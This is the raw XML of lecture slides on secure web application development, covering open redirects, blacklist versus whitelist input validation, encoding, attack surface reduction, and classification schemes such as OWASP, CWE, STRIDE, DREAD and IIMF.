                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://somesite.com/login.php?redirect=admin.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="3200400"/>
            <a:ext cx="5486400" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -34119"/>
              <a:gd name="adj2" fmla="val -71756"/>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Any redirect that comes from an action could have another site injected into it.  The first example sends users to a phishing site while the second attempts an escalation of privilege.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19272845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Often the first tool security-aware programmers turn to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic principle: never trust the user unless you want to be untrusted yourself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Blacklist validation: attempts to define what bad data looks like.  Reject anything that matches.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Whitelist validation: attempts to define what good data looks like.  Reject anything that doesn’t match.</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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23164156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Blacklist validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Almost always fails to work as expected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The set of bad data is almost always larger than the set of good data for an application.  Blacklist is unmanageable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="3733800"/>
            <a:ext cx="4572000" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49877"/>
              <a:gd name="adj2" fmla="val -78862"/>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Consider trying to protect children from inappropriate internet sites.  How fast do new entries pop up?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166226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Blacklist validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Almost always fails to work as expected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The set of bad data is almost always larger than the set of good data for an application.  Blacklist is unmanageable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are too many ways of encoding data to clean it all up.  Plaintext, URL, HTML, XML, double, UTF-8 encoded, etc.  See Sullivan &amp; Liu, p. 27.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18065570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Whitelist validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Almost always easier to define what good data looks like than bad data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you’re expecting a number, don’t accept text, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client side validation is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>performant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, but not sufficient.  Must have matching server-side validation rules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Still have the problem of dangerous characters that can act as commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E.g. the last name “O’Connor” can’t be rejected because it has a ’ character in it.</a:t>
            </a:r>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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23000408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Early vs. late validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Really, the problem of “encoding”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When we receive untrusted data, should it be sanitized before it goes into the database (i.e. immediately) or should it be sanitized before we use it?</a:t>
            </a:r>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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8198418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Early vs. late validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Really, the problem of “encoding”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When we receive untrusted data, should it be sanitized before it goes into the database (i.e. immediately) or should it be sanitized before we use it?</a:t>
            </a:r>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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4686300" y="3886200"/>
            <a:ext cx="3886200" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7236"/>
              <a:gd name="adj2" fmla="val -111948"/>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Will all your database output always be rendered as HTML to the user?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="579496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Lists of Very Bad Things</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>OWASP Top 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– Open Web Application Security Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CWE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Common Weakness Enumeration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mitre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Corp.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>CWE/SANS Top 25 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most Dangerous Software Errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>WASC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Web Application Security Consortium) Threat Classification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{16D7F6B3-FE9A-4A71-A476-BA18060D4072}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="2667000"/>
            <a:ext cx="5486400" cy="2895600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -74975"/>
              <a:gd name="adj2" fmla="val -42770"/>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This is different from CVE (Common Vulnerabilities and Exposures) which are actual bugs in real products.  Each attack in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> targets a particular CVE (numbered by YEAR-NUMBER).  CWEs are categories that when exploited result in CVEs.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33662227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Validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Early vs. late validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Really, the problem of “encoding”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When we receive untrusted data, should it be sanitized before it goes into the database (i.e. immediately) or should it be sanitized before we use it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4686300" y="3886200"/>
            <a:ext cx="3886200" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7236"/>
              <a:gd name="adj2" fmla="val -111948"/>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Will all your database output always be rendered as HTML to the user?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rounded Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="4038600"/>
            <a:ext cx="3886200" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9850"/>
              <a:gd name="adj2" fmla="val -89287"/>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Or could your data be used in unexpected places (such as an LDAP query or XML document)?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36476785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Attack Surface Reduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The “attack surface” of your application is every feature that a user can touch directly or indirectly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reducing attack surface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reduce features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Have reasonable defaults for enabled services (opt in to more instead of opt out for less)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Employ least privilege principles (authorization)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Separation of privilege a the database level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Know your language/libraries to pick the right tools</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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15902165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STRIDE, DREAD, IIMF, and CWE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>STRIDE: general categories of attacks; spoofing, tampering, repudiation, information disclosure, denial of service, elevation of privilege.</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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5562600" y="3581400"/>
            <a:ext cx="3048000" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -51059"/>
              <a:gd name="adj2" fmla="val -89287"/>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Covered substantially last week.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21763637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STRIDE, DREAD, IIMF, and CWE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>STRIDE: general categories of attacks; spoofing, tampering, repudiation, information disclosure, denial of service, elevation of privilege.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DREAD: a qualitative classification schema masquerading as a quantitative approach.  Damage potential, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reproducability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, exploitability, affected users, discoverability </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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="5029200"/>
            <a:ext cx="2590800" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -51059"/>
              <a:gd name="adj2" fmla="val -89287"/>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Also covered last week.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42525033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STRIDE, DREAD, IIMF, and CWE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{16D7F6B3-FE9A-4A71-A476-BA18060D4072}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>54</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074693976"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5486400" y="1905000"/>
          <a:ext cx="2611203" cy="3822787"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s1029" name="Visio" r:id="rId3" imgW="2336076" imgH="3420428" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="2336076" imgH="3420428" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId4"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="5486400" y="1905000"/>
                        <a:ext cx="2611203" cy="3822787"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="4648200" cy="464820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dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IIMF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: interception, interruption, modification, fabrication.  Similar kinds of categories as STRIDE, but based on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>effect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of the attack, not the cause.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="5334001"/>
            <a:ext cx="2324100" cy="609599"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 55361"/>
              <a:gd name="adj2" fmla="val -125435"/>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Cause, specific</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6781800" y="1066800"/>
            <a:ext cx="2086264" cy="609599"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5000"/>
              <a:gd name="adj2" fmla="val 110929"/>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Effect, general</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19716282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STRIDE, DREAD, IIMF, and CWE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CWE: Common Weaknesses Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mitre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> corporation spinoff of CVE list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Similar to OWASP top 10, but much more specific.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each CVE has a cause that is a CWE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ex: CWE-306 “Missing Authentication for Critical Function” is A02 “Broken Authentication and Session Management” but much more specific.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.criticalwatch.com/assets/c-Owasp-to-Wasc-to-CWE-Mapping-Tech-Paper-0710131.pdf</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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26891657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STRIDE, DREAD, IIMF, and CWE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CWE: Common Weaknesses Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
